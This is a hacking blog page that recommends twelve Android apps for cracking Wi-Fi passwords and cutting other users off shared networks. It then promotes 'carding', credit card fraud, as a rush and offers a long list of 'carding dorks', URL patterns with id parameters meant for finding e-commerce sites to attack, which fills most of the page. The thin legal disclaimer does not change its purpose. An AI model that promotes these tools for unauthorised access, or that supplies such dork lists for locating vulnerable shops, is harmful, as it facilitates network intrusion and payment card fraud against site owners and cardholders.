How To Hack Wifi Password Using Smartphones

How To Hack WiFi Password Using Smartphones? Every computer and Android geek always think to hack wi-fi network password from Android mobile. With Android Phone, you can do lots of hacking attacks. WiFi hacking is not so easy task but it’s possible with one easy and simple trick. And this is only possible with some cool apps that can be used to hack wi-fi network. So, have a look on complete guide discussed below.

Also Read: Hack WPA2-PSK WiFi Password Using Linux

Top 12 WiFi Hacking App For Android:

Here we have discussed some best apps that you will be using to crack the wi-fi network security. These apps will work only in rooted Android and for that follow the guide to Root to Android. Have a look on these apps below.

Also Read: 2 Best Methods to Hack Wi-Fi using Android Phones

#1 WPS Connect:

WPS Connect

Download => WPS Connect

WPS Connect is Android WiFi Hacking App for a rooted Android phone. With this app, you can disable other user’s net connection on the same wi-fi network. With this WPS Connect application, you can hack any wi-fi network and connect automatically to any password protected wi-fi network. Download WPS Connect and start cracking wi-fi network around you.

Also Read: 10 Best Websites To Visit If You Want To Be A Hacker

#2 Wifi WPS Wpa Tester:

WIFI WPS WPA TESTER

Download =>Wifi WPS Wpa Tester

The best Android app that will work with your rooted Android and is one of the best apps to crack into wi-fi network around you. Using this app, you can connect to some of the routers that have some vulnerabilities that can be targeted by this app. So try out this app, you will surely get the best result that you think of.

Also Read: How To Hack Wifi Password Using Smartphones

#3 WifiKill:

wifikill

Download =>WifiKill

This is one the cool app that will allow killing all the devices that being connected to the wi-fi network. Using this app, you can easily block the internet access to all other devices that connected to the same wi-fi network. So must try this cool app on your Android device.

Also Read: How to do SIM Cloning

#4 Wifinspect:

wifinspect

Download =>Wifinspect

WiFinspect is a multi-tool intended for Computer Security professionals and other advanced users that wish to check the networks they own or have permission, i.e. the app is a security audit tool and not a hacking too. So must try this cool app on your Android device.

Also Read: XSS Attack

#5 ZAnti Penetration Testing Android Hacking Toolkit:

ZAnti

Download =>ZAnti Penetration Testing Android Hacking Toolkit

ZAnti is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy to use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to find the malicious techniques they use in the wild to compromise the corporate network.

Also Read: Folder Blaster Worm

#6 Fing Networks Tools:

Fing Network Tool

Download =>Fing Networks Tools

This is one of the best network analyzer tools that works on your rooted Android. Find out which devices are connected to your Wi-Fi network in just a few seconds and this app is fast and correct. Fing is a professional App for network analysis. A simple and intuitive interface helps you test security levels, detect intruders and resolve network issues.

Also Read: RAT – Remote Administration Tool

 #7 Network Discovery:

Network Discovery

Download =>Network Discovery

This is quite simple and cool app that don’t require root access to do its functioning. So you can use this cool app on your Android to keep track on all the network details that your Android being connected.

Download 12 Hacking Books FREE: HACKER HIGHSCHOOL

#8 Nmap for Android:

nmap

Download =>Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. This application is not an official app but it looks good.

Also Read: Deface Websites Using SQL Injection

#9 WiFi Spoofer:

WiFi Spoofer

Download =>WiFi Spoofer

This app is one of the best security testing tools for your Android. And this can be used to change websites on other people’s computers from your Android-based smartphones. Although this is not exactly a penetration testing tool, it can still show you how easy or difficult it is to hack a particular network with your Android.

Also Read: Disposable Chat Room

#10 WiFi Finder:

WiFi Finder

Download =>WiFi Finder

Wi-Fi Finder is simply the best app for finding free or paid public Wi-Fi hotspots online or offline—perfect for Skype users on the go. It can view Wi-Fi hotspot detail, call location, get directions or share the hotspot, Filter results by location (café, hotel, etc.) or provider type, Scan for Wi-Fi hotspots around you

Also Read: Lock And Unlock Computer With Pendrive

#11 Wifi Analyzer:

WiFi Analyzer

Download =>Wifi Analyzer

Turns your Android phone into a Wi-Fi analyzer! Shows the Wi-Fi channels around you. Helps you to find a less crowded channel for your wireless router.

Also Read: Hack WPA2-PSK WiFi Password Using Linux

#12 WiFi You:

WiFi You

Download =>WiFi You

WiFi You is a powerful app collecting millions of wi-fi passwords shared by end users worldwide and storing & distributing them from our cloud server for you to enjoy free network and traffic saving. It will be your wi-fi key and will automatically find all available WiFi networks nearby. You can connect to the free wi-fi with one single click.

Also Read: Remove Virus Using CMD

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and feel free to drop a comment below if you still face any kind of problem.


Carding is the art of Credit Card Manipulation to access goods or services by way of fraud. But don’t let the “Politically Correct” definition of carding stop fool you because carding is more than that. Although different people card for different reasons, the motive is usually tied to money. Yea, handling a $10,000 product in your hands and knowing that you didn’t pay a single penny for it is definitely a rush. Grab the Latest Carding Dorks 2017 so that you can easily hack any e-commerce website.

List Of Latest Carding Dorks 2017 :

accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=

archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=

category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=

faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup

item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=
page.php?PartID=
payment.php?CartID=
pdetail.php?item_id=
powersearch.php?CartId=
price.php
privacy.php?cartID=
prodbycat.php?intCatalogID=
prodetails.php?prodid=
prodlist.php?catid=
product.php?bookID=
product.php?intProdID=
product_info.php?item_id=
productDetails.php?idProduct=
productDisplay.php
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productpage.php
products.php?ID=
products.php?keyword=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsByCategory.php?intCatalogID=
prodView.php?idProduct=
promo.php?id=
promotion.php?catid=
pview.php?Item=
resellers.php?idCategory=
results.php?cat=
savecart.php?CartId=
search.php?CartID=
searchcat.php?search_id=
Select_Item.php?id=
Services.php?ID=
shippinginfo.php?CartId=
shop.php?a=

shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop_details.php?prodid=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
ShopSearch.php?CategoryID=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showStore.php?catID=
shprodde.php?SKU=
specials.php?id=
store.php?id=
store_bycat.php?id=
store_listing.php?id=
Store_ViewProducts.php?Cat=
store-details.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
StoreRedirect.php?ID=
subcategories.php?id=
tek9.php?
template.php?Action=Item&pid=
topic.php?ID=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=

updates.php?ID=
view.php?cid=
view_cart.php?title=
view_detail.php?ID=
viewcart.php?CartId=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewevent.php?EventID=
viewitem.php?recor=
viewPrd.php?idcategory=
ViewProduct.php?misc=
voteList.php?item_ID=
whatsnew.php?idCategory=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
sitio/item.php?idcd=
index.php?site=
de/content.php?page_id=
gallerysort.php?iid=
products.php?type=
event.php?id=
showfeature.php?id=
home.php?ID=
tas/event.php?id=
profile.php?id=
details.php?id=
past-event.php?id=
index.php?action=
site/products.php?prodid=
page.php?pId=
resources/vulnerabilities_list.php?id=
site.php?id=
products/index.php?rangeid=
global_projects.php?cid=
publications/view.php?id=
display_page.php?id=
pages.php?ID=
lmsrecords_cd.php?cdid=
product.php?prd=
cat/?catid=
products/product-list.php?id=
debate-detail.php?id=
cbmer/congres/page.php?LAN=
content.php?id=
news.php?ID=
photogallery.php?id=
index.php?id=
product/product.php?product_no=
nyheder.htm?show=
book.php?ID=
print.php?id=
detail.php?id=
book.php?id=
content.php?PID=
more_detail.php?id=
content.php?id=
view_items.php?id=
view_author.php?id=
main.php?id=
english/fonction/print.php?id=
magazines/adult_magazine_single_page.php?magid=
product_details.php?prodid=
magazines/adult_magazine_full_year.php?magid=
products/card.php?prodID=
catalog/product.php?cat_id=
e_board/modifyform.html?code=
community/calendar-event-fr.php?id=
products.php?p=
news.php?id=
view/7/9628/1.html?reply=
product_details.php?prodid=

catalog/product.php?pid=
rating.php?id=
?page=
catalog/main.php?cat_id=
index.php?page=
detail.php?prodid=
products/product.php?pid=
news.php?id=
book_detail.php?BookID=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
default.php?cPath=
catalog/main.php?cat_id=
catalog/main.php?cat_id=
category.php?catid=
categories.php?cat=
categories.php?cat=
detail.php?prodID=
detail.php?id=
category.php?id=
hm/inside.php?id=
index.php?area_id=
gallery.php?id=
products.php?cat=
products.php?cat=
media/pr.php?id=
books/book.php?proj_nr=
products/card.php?prodID=
general.php?id=
news.php?t=
usb/devices/showdev.php?id=
content/detail.php?id=
templet.php?acticle_id=
news/news/title_show.php?id=
product.php?id=
index.php?url=
cryolab/content.php?cid=
ls.php?id=
s.php?w=
abroad/page.php?cid=
bayer/dtnews.php?id=
news/temp.php?id=
index.php?url=
book/bookcover.php?bookid=
index.php/en/component/pvm/?view=
product/list.php?pid=
cats.php?cat=
software_categories.php?cat_id=
print.php?sid=
docDetail.aspx?chnum=
index.php?section=
index.php?page=
index.php?page=
en/publications.php?id=
events/detail.php?ID=
forum/profile.php?id=
media/pr.php?id=
content.php?ID=
cloudbank/detail.php?ID=
pages.php?id=
news.php?id=
beitrag_D.php?id=
content/index.php?id=
index.php?i=
?action=
index.php?page=
beitrag_F.php?id=
index.php?pageid=
page.php?modul=
detail.php?id=
index.php?w=
index.php?modus=
news.php?id=
news.php?id=
aktuelles/meldungen-detail.php?id=
item.php?id=
obio/detail.php?id=
page/de/produkte/produkte.php?prodID=
packages_display.php?ref=
shop/index.php?cPath=
modules.php?bookid=
product-range.php?rangeID=
en/news/fullnews.php?newsid=
deal_coupon.php?cat_id=
show.php?id=
blog/index.php?idBlog=
redaktion/whiteteeth/detail.php?nr=
HistoryStore/pages/item.php?itemID=
aktuelles/veranstaltungen/detail.php?id=
tecdaten/showdetail.php?prodid=
?id=
rating/stat.php?id=
content.php?id=
viewapp.php?id=
item.php?id=
news/newsitem.php?newsID=
FernandFaerie/index.php?c=
show.php?id=
?cat=
categories.php?cat=
category.php?c=
product_info.php?id=
prod.php?cat=
store/product.php?productid=
browsepr.php?pr=
product-list.php?cid=
products.php?cat_id=
product.php?ItemID=
category.php?c=
main.php?id=
article.php?id=
showproduct.php?productId=
view_item.php?item=
skunkworks/content.php?id=
index.php?id=
item_show.php?id=
publications.php?Id=

index.php?t=
view_items.php?id=
portafolio/portafolio.php?id=
YZboard/view.php?id=
index_en.php?ref=
index_en.php?ref=
category.php?id_category=
main.php?id=
main.php?id=
calendar/event.php?id=
default.php?cPath=
pages/print.php?id=
index.php?pg_t=
_news/news.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
downloads/shambler.php?id=
sinformer/n/imprimer.php?id=
More_Details.php?id=
directory/contenu.php?id_cat=
properties.php?id_cat=
forum/showProfile.php?id=
downloads/category.php?c=
index.php?cat=
product_info.php?products_id=
product_info.php?products_id=
product-list.php?category_id=
detail.php?siteid=
projects/event.php?id=
view_items.php?id=
more_details.php?id=
melbourne_details.php?id=
more_details.php?id=
detail.php?id=
more_details.php?id=
home.php?cat=
idlechat/message.php?id=
detail.php?id=
print.php?sid=
more_details.php?id=
default.php?cPath=
events/event.php?id=
brand.php?id=
toynbeestudios/content.php?id=
show-book.php?id=
more_details.php?id=
store/default.php?cPath=
property.php?id=
product_details.php?id=
more_details.php?id=
view-event.php?id=
content.php?id=
book.php?id=
page/venue.php?id=
print.php?sid=
colourpointeducational/more_details.php?id=
print.php?sid=
browse/book.php?journalID=
section.php?section=
bookDetails.php?id=
profiles/profile.php?profileid=
event.php?id=
gallery.php?id=
category.php?CID=
corporate/newsreleases_more.php?id=
print.php?id=
view_items.php?id=
more_details.php?id=
county-facts/diary/vcsgen.php?id=
idlechat/message.php?id=
podcast/item.php?pid=
products.php?act=
details.php?prodId=
socsci/events/full_details.php?id=
ourblog.php?categoryid=
mall/more.php?ProdID=
archive/get.php?message_id=
review/review_form.php?item_id=
english/publicproducts.php?groupid=
news_and_notices.php?news_id=
rounds-detail.php?id=
gig.php?id=
board/view.php?no=
index.php?modus=
news_item.php?id=
rss.php?cat=
products/product.php?id=
details.php?ProdID=
els_/product/product.php?id=
store/description.php?iddesc=
socsci/news_items/full_story.php?id=
modules/forum/index.php?topic_id=
feature.php?id=
products/Blitzball.htm?id=
profile_print.php?id=
questions.php?questionid=
html/scoutnew.php?prodid=
main/index.php?action=
********.php?cid=
********.php?cid=
news.php?type=
index.php?page=
viewthread.php?tid=
summary.php?PID=
news/latest_news.php?cat_id=
index.php?cPath=
category.php?CID=
index.php?pid=
more_details.php?id=
specials.php?osCsid=
search/display.php?BookID=
articles.php?id=
print.php?sid=
page.php?id=
more_details.php?id=
newsite/pdf_show.php?id=
shop/category.php?cat_id=
shopcafe-shop-product.php?bookId=
shop/books_detail.php?bookID=
index.php?cPath=
more_details.php?id=
news.php?id=
more_details.php?id=
shop/books_detail.php?bookID=
more_details.php?id=
blog.php?blog=
index.php?pid=
prodotti.php?id_cat=
category.php?CID=
more_details.php?id=
poem_list.php?bookID=
more_details.php?id=
content.php?categoryId=
authorDetails.php?bookID=
press_release.php?id=
item_list.php?cat_id=
colourpointeducational/more_details.php?id=
index.php?pid=
download.php?id=
shop/category.php?cat_id=
i-know/content.php?page=
store/index.php?cat_id=
yacht_search/yacht_view.php?pid=
pharmaxim/category.php?cid=
print.php?sid=
specials.php?osCsid=
store.php?cat_id=
category.php?cid=
displayrange.php?rangeid=
product.php?id=
csc/news-details.php?cat=
products-display-details.php?prodid=
stockists_list.php?area_id=
news/newsitem.php?newsID=
index.php?pid=
newsitem.php?newsid=
category.php?id=
news/newsitem.php?newsID=
details.php?prodId=
publications/publication.php?id=
purelydiamond/products/category.php?cat=
category.php?cid=
product/detail.php?id=
news/newsitem.php?newsID=
details.php?prodID=
item.php?item_id=
edition.php?area_id=
page.php?area_id=
view_newsletter.php?id=
library.php?cat=
categories.php?cat=
page.php?area_id=
categories.php?cat=
publications.php?id=
item.php?sub_id=
page.php?area_id=
page.php?area_id=
category.php?catid=

content.php?cID=
newsitem.php?newsid=
frontend/category.php?id_category=
news/newsitem.php?newsID=
things-to-do/detail.php?id=
page.php?area_id=
page.php?area_id=
listing.php?cat=
item.php?iid=
customer/home.php?cat=
staff/publications.php?sn=
news/newsitem.php?newsID=
library.php?cat=
main/index.php?uid=
library.php?cat=
shop/eventshop/product_detail.php?itemid=
news/newsitem.php?newsID=
news/newsitem.php?newsID=
library.php?cat=
FullStory.php?Id=
publications.php?ID=
publications/book_reviews/full_review.php?id=
newsitem.php?newsID=
newsItem.php?newsId=
site/en/list_service.php?cat=
page.php?area_id=
product.php?ProductID=
releases_headlines_details.php?id=
product.php?shopprodid=
product.php?productid=
product.php?product=
product.php?product_id=
productlist.php?id=
product.php?shopprodid=
garden_equipment/pest-weed-control/product.php?pr=
product.php?shopprodid=
browsepr.php?pr=
productlist.php?id=
kshop/product.php?productid=
product.php?pid=
showproduct.php?prodid=
product.php?productid=
productlist.php?id=
index.php?pageId=
productlist.php?tid=
product-list.php?id=
onlinesales/product.php?product_id=
garden_equipment/Fruit-Cage/product.php?pr=
product.php?shopprodid=
product_info.php?products_id=
productlist.php?tid=
showsub.php?id=
productlist.php?fid=
products.php?cat=
products.php?cat=
product-list.php?id=
product.php?sku=
store/product.php?productid=
products.php?cat=
productList.php?cat=
product_detail.php?product_id=
product.php?pid=
wiki/pmwiki.php?page****=
summary.php?PID=
productlist.php?grpid=
cart/product.php?productid=
db/CART/product_details.php?product_id=
ProductList.php?id=
products/product.php?id=
product.php?shopprodid=
product_info.php?products_id=
product_ranges_view.php?ID=
cei/cedb/projdetail.php?projID=
products.php?DepartmentID=
product.php?shopprodid=
product.php?shopprodid=
product_info.php?products_id=
index.php?news=
education/content.php?page=
Interior/productlist.php?id=
products.php?categoryID=
modules.php?****=
message/comment_threads.php?postID=
artist_art.php?id=
products.php?cat=
index.php?option=
ov_tv.php?item=
index.php?lang=
showproduct.php?cat=
index.php?lang=
product.php?bid=
product.php?bid=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
item_show.php?lid=
?pagerequested=
downloads.php?id=
print.php?sid=
print.php?sid=
product.php?intProductID=
productList.php?id=
product.php?intProductID=
more_details.php?id=
more_details.php?id=
books.php?id=
index.php?offs=
mboard/replies.php?parent_id=
Computer Science.php?id=
news.php?id=
pdf_post.php?ID=
reviews.php?id=
art.php?id=
prod.php?cat=
event_info.php?p=
view_items.php?id=
home.php?cat=
item_book.php?CAT=
www/index.php?page=
schule/termine.php?view=
goods_detail.php?data=
storemanager/contents/item.php?page_code=
view_items.php?id=
customer/board.htm?mode=
help/com_view.html?code=
n_replyboard.php?typeboard=
eng_board/view.php?T****=
prev_results.php?prodID=
bbs/view.php?no=
gnu/?doc=
zb/view.php?uid=
global/product/product.php?gubun=
m_view.php?ps_db=
naboard/memo.php?bd=
bookmark/mybook/bookmark.php?bookPageNo=
board/board.html?table=
kboard/kboard.php?board=
order.asp?lotid=
english/board/view****.php?code=
goboard/front/board_view.php?code=
bbs/bbsView.php?id=
boardView.php?bbs=
eng/rgboard/view.php?&bbs_id=
product/product.php?cate=
content.php?p=
page.php?module=
?pid=
bookpage.php?id=
view_items.php?id=
index.php?pagina=
product.php?prodid=
notify/notify_form.php?topic_id=
php/index.php?id=
content.php?cid=
product.php?product_id=
constructies/product.php?id=
detail.php?id=
php/index.php?id=
index.php?section=
product.php?****=
show_bug.cgi?id=
detail.php?id=
bookpage.php?id=
product.php?id=
today.php?eventid=
main.php?item=
index.php?cPath=
news.php?id=
event.php?id=
print.php?sid=
news/news.php?id=
module/range/dutch_windmill_collection.php?rangeId=
print.php?sid=

show_bug.cgi?id=
product_details.php?product_id=
products.php?groupid=
projdetails.php?id=
product.php?productid=
products.php?catid=
product.php?product_id=
product.php?prodid=
product.php?prodid=
newsitem.php?newsID=
newsitem.php?newsid=
profile.php?id=
********s_in_area.php?area_id=
productlist.php?id=
productsview.php?proid=
rss.php?cat=
pub/pds/pds_view.php?start=
products.php?rub=
ogloszenia/rss.php?cat=
print.php?sid=
product.php?id=
print.php?sid=
magazin.php?cid=
galerie.php?cid=
www/index.php?page=
view.php?id=
content.php?id=
board/read.php?tid=
product.php?id_h=
news.php?id=
index.php?book=
products.php?act=
reply.php?id=
stat.php?id=
products.php?cat_id=
free_board/board_view.html?page=
item.php?id=
view_items.php?id=
main.php?prodID=
gb/comment.php?gb_id=
gb/comment.php?gb_id=
classifieds/showproduct.php?product=
view.php?pageNum_rscomp=
cart/addToCart.php?cid=
content/pages/index.php?id_cat=
content.php?id=
display.php?ID=
display.php?ID=
ponuky/item_show.php?ID=
default.php?cPath=
main/magpreview.php?id=
***zine/board.php?board=
content.php?arti_id=
mall/more.php?ProdID=
product.php?cat=
news.php?id=
content/view.php?id=
content.php?id=
index.php?action=
board_view.php?s_board_id=
KM/BOARD/readboard.php?id=
board_view.html?id=
content.php?cont_title=
category.php?catid=
mall/more.php?ProdID=
publications.php?id=
irbeautina/product_detail.php?product_id=
print.php?sid=
index_en.php?id=
bid/topic.php?TopicID=
news_content.php?CategoryID=
front/bin/forumview.phtml?bbcode=
cat.php?cat_id=
stat.php?id=
veranstaltungen/detail.php?id=
more_details.php?id=
english/print.php?id=
print.php?id=
view_item.php?id=
content/conference_register.php?ID=
rss/event.php?id=
event.php?id=
main.php?id=
rtfe.php?siteid=
category.php?cid=
classifieds/detail.php?siteid=
tools/print.php?id=
channel/channel-layout.php?objId=
content.php?id=
resources/detail.php?id=
more_details.php?id=
detail.php?id=
view_items.php?id=
content/programme.php?ID=
book.php?id=
php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s=
detail.php?id=
default.php?cPath=
more_details.php?id=
php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s=
content.php?id=
view_items.php?id=
default.php?cPath=
book.php?id=
view_items.php?id=
products/parts/detail.php?id=
category.php?cid=
book.html?isbn=
view_item.php?id=
picgallery/category.php?cid=
detail.php?id=
print.php?sid=
displayArticleB.php?id=
knowledge_base/detail.php?id=
bpac/calendar/event.php?id=
mb_showtopic.php?topic_id=
pages.php?id=

content.php?id=
exhibition_overview.php?id=
singer/detail.php?siteid=
Category.php?cid=
detail.php?id=
print.php?sid=
category.php?cid=
more_detail.php?X_EID=
book.php?ISBN=
view_items.php?id=
category.php?cid=
htmlpage.php?id=
story.php?id=
tools/print.php?id=
print.php?sid=
php/event.php?id=
print.php?sid=
articlecategory.php?id=
print.php?sid=
ibp.php?ISBN=
club.php?cid=
view_items.php?id=
aboutchiangmai/details.php?id=
view_items.php?id=
book.php?isbn=
blog_detail.php?id=
event.php?id=
default.php?cPath=
product_info.php?products_id=
shop_display_products.php?cat_id=
print.php?sid=
modules/content/index.php?id=
printcards.php?ID=
events/event.php?ID=
more_details.php?id=
default.php?TID=
general.php?id=
detail.php?id=
event.php?id=
referral/detail.php?siteid=
view_items.php?id=
event.php?id=
view_items.php?id=
category.php?id=
cemetery.php?id=
index.php?cid=
content.php?id=
exhibitions/detail.php?id=
bookview.php?id=
edatabase/home.php?cat=
view_items.php?id=
store/view_items.php?id=
print.php?sid=
events/event_detail.php?id=
view_items.php?id=
detail.php?id=
pages/video.php?id=
about_us.php?id=
recipe/category.php?cid=
view_item.php?id=
en/main.php?id=
print.php?sid=
More_Details.php?id=
category.php?cid=
home.php?cat=
article.php?id=
page.php?id=
print-story.php?id=
psychology/people/detail.php?id=
print.php?sid=
print.php?ID=
article_preview.php?id=
Pages/whichArticle.php?id=
view_items.php?id=
Sales/view_item.php?id=
book.php?isbn=
knowledge_base/detail.php?id=
gallery/gallery.php?id=
event.php?id=
detail.php?id=
store/home.php?cat=
view_items.php?id=
detail.php?ID=
event_details.php?id=
detailedbook.php?isbn=
fatcat/home.php?view=
events/index.php?id=
static.php?id=
answer/default.php?pollID=
news/detail.php?id=
view_items.php?id=
events/unique_event.php?ID=
gallery/detail.php?ID=
print.php?sid=
view_items.php?id=
board/showthread.php?t=
book.php?id=
event.php?id=
more_detail.php?id=
knowledge_base/detail.php?id=
html/print.php?sid=
index.php?id=
content.php?ID=
Shop/home.php?cat=
store/home.php?cat=
print.php?sid=
gallery.php?id=
resources/index.php?cat=
events/event.php?id=
view_items.php?id=
default.php?cPath=
content.php?id=
products/products.php?p=
auction/item.php?id=
products.php?cat=
clan_page.php?cid=
product.php?sku=
item.php?id=
events?id=
comments.php?id=
products/?catID=
modules.php?****=
fshstatistic/index.php?PID=
products/products.php?p=
sport.php?revista=
products.php?p=
products.php?openparent=
home.php?cat=
news/shownewsarticle.php?articleid=
discussions/10/9/?CategoryID=
trailer.php?id=
news.php?id=
?page=
index.php?page=
item/detail.php?num=
features/view.php?id=
site/?details&prodid=
product_info.php?products_id=
remixer.php?id=
proddetails_print.php?prodid=
pylones/item.php?item=
index.php?cont=
product.php?ItemId=
video.php?id=
detail.php?item_id=
filemanager.php?delete=
news/newsletter.php?id=
shop/home.php?cat=
designcenter/item.php?id=
board/kboard.php?board=
index.php?id=
board/view_temp.php?table=
magazine-details.php?magid=
thread.php/id=
index.php?y=
products.php?sub=
products.html?file=
xcart/home.php?cat=
event.php?contentID=
forum/showthread.php?p=
model.php?item=
product_details.php?prodid=
kboard/kboard.php?board=
english/index.php?id=
products.php?req=
search.php?q=
products.php?openparent=
product.php?id=
content.php?op=
event_listings_short.php?s=
stat.php?id=
print.php?id=
tutorial.php?articleid=
product.php?product=
content/view.php?id=
phorum/read.php?3,716,721,quote=
php/fidEAD6DDC6CC9D1ADDFD7876B7715A3342E18A865C.aspx?s=
suffering/newssummpopup.php?newscode=

kr/product/product.php?gubun=
content.php?nID=
search***.php?ki=
nightlife/martini.php?cid=
detail.php?id=
discussions/9/6/?CategoryID=
seWork.aspx?WORKID=
modules.php?****=
products.php?cat=
products.php?p=
cheats/item.php?itemid=
index.php?main=
modules/xfmod/forum/forum.php?thread_id=
downloads.php?type=
club.php?cid=
content.php?id=
forums/search.php?do=
mlx/slip_about_sharebacks.php?item=
category.php?categoryid=
nasar/news.php?id=
news.php?id=
show.php?item=
rmcs/opencomic.phtml?rowid=
products.php?cid=
index.php?url=
showmedia.php?id=
lit_work.php?w_id=
site_list.php?sort=
home.php?cat=
joblog/index.php?mode=
eng/board/view.php?id=
item.php?id=
index.php?m=
detail.php?id=
goods_detail.php?goodsIdx=
index.php?str=
episode.php?id=
link.php?type=
resources/detail.php?id=
display-product.php?Product=
main/viewItem.php?itemid=
item.php?iid=
index.php?list=
products.php?p=
subcat.php?catID=
htm/item_cat.php?item_id=
addcolumn.php?id=
cats.php?cat=
cats.php?cat=
?page=
modules/content/index.php?id=
detail.php?cat_id=
site/?details&prodid=
product.php?lang=
modules/wfdownloads/singlefile.php?cid=
details.php?prodid=
myResources_noBanner.php?categoryID=
product.php?id=
ppads/external.php?type=
store/product.php?productid=
detail.php?id=
prod_details.php?products_id=
board/templete/sycho/input.php?table=
cats.php?cat=
product/product.php?product_no=
search.php?q=
record_profile.php?id=
index.php?y=
view.php?v_id=
awards/index.php?input1=
jobsite_storage_equipment/view_products.php?p_id=
rural/rss.php?cat=
calendar.php?event_id=
eshop.php?id=
content.php?ID=
addimage.php?cid=
category.php?cid=
artist_info.php?artistId=
forum/viewtopic.php?TopicID=
browse.php?cid=
editProduct.php?cid=
main/index.php?uid=
tutorials/view.php?id=
products.php?p=
index.php?size=
pylones/item.php?item=
categories.php?start=
portfolio.html?categoryid=
forums/showthread.php?t=
item.php?code=
products.php?cat=
TopResources.php?CategoryID=
opinion.php?option=
modify_en.htm?mode=
events/detail.php?id=
cart/prod_details.php?prodid=
html/home/products/product.php?pid=
product.php?product_no=
auction/item.php?id=
cms/showpage.php?cid=
touchy/home.php?cat=
products.php?sku=
fcms/view.php?cid=
newsletter/newsletter.php?letter=
campkc-view-event.php?Item_ID=
forums/index.php?page=
products.php?session=
view_event.php?eid=
product.php?pcid=
db/item.html?item=
item.php?item_id=
order-now.php?prodid=
product.php?id=
store_prod_details.php?ProdID=
products.php?sku=
news.php?item=
news.php?id=
cart/prod_details.php?prodid=
products/products.php?p=
category.php?cid=
specials.php?osCsid=
infusions/book_panel/books.php?bookid=
special_offers/more_details.php?id=
book.php?id=
journal.php?id=
category.php?cid=
News/press_release.php?id=
pages/index.php?pID=
exclusive.php?pID=
shop/pages.php?page=
index.php?cPath=
shop/index.php?cat_id=
artistdetail.php?ID=
products_connections_detail.php?cat_id=
php/fid27BF3BCB1A648805B511298CE6D643E72B4D59AD.aspx?s=
reviews/more_details.php?id=
press_release.php?id=
product.php?rangeid=
knowledgebase/article.php?id=
store/index.php?cat_id=
news.php?cat_id=
Products/products.php?showonly=
eng/store/show_scat.php?cat_id=
search/index.php?q=
news/press_release.php?id=
html/print.php?sid=
aggregator.php?id=
news/shownews.php?article=
default.php?cPath=
press_release.php?id=
book.php?bookid=
cubecart/index.php?cat_id=
classified/detail.php?siteid=
cart/item_show.php?itemID=
theater-show.php?id=
cube/index.php?cat_id=
preorder.php?bookID=
category.php?cid=
category.php?cat_id=
eventsdetail.php?pid=
forum/index.php?topic=
print.php?sid=
article.php?id=
html/products.php?id=
print.php?sid=
read.php?in=
index.php?cat_id=
top/store.php?cat_id=
hearst_journalism/press_release.php?id=
press_release.php?id=
shop/category.php?cat_id=
projectdisplay.php?pid=
FREE/poll.php?pid=
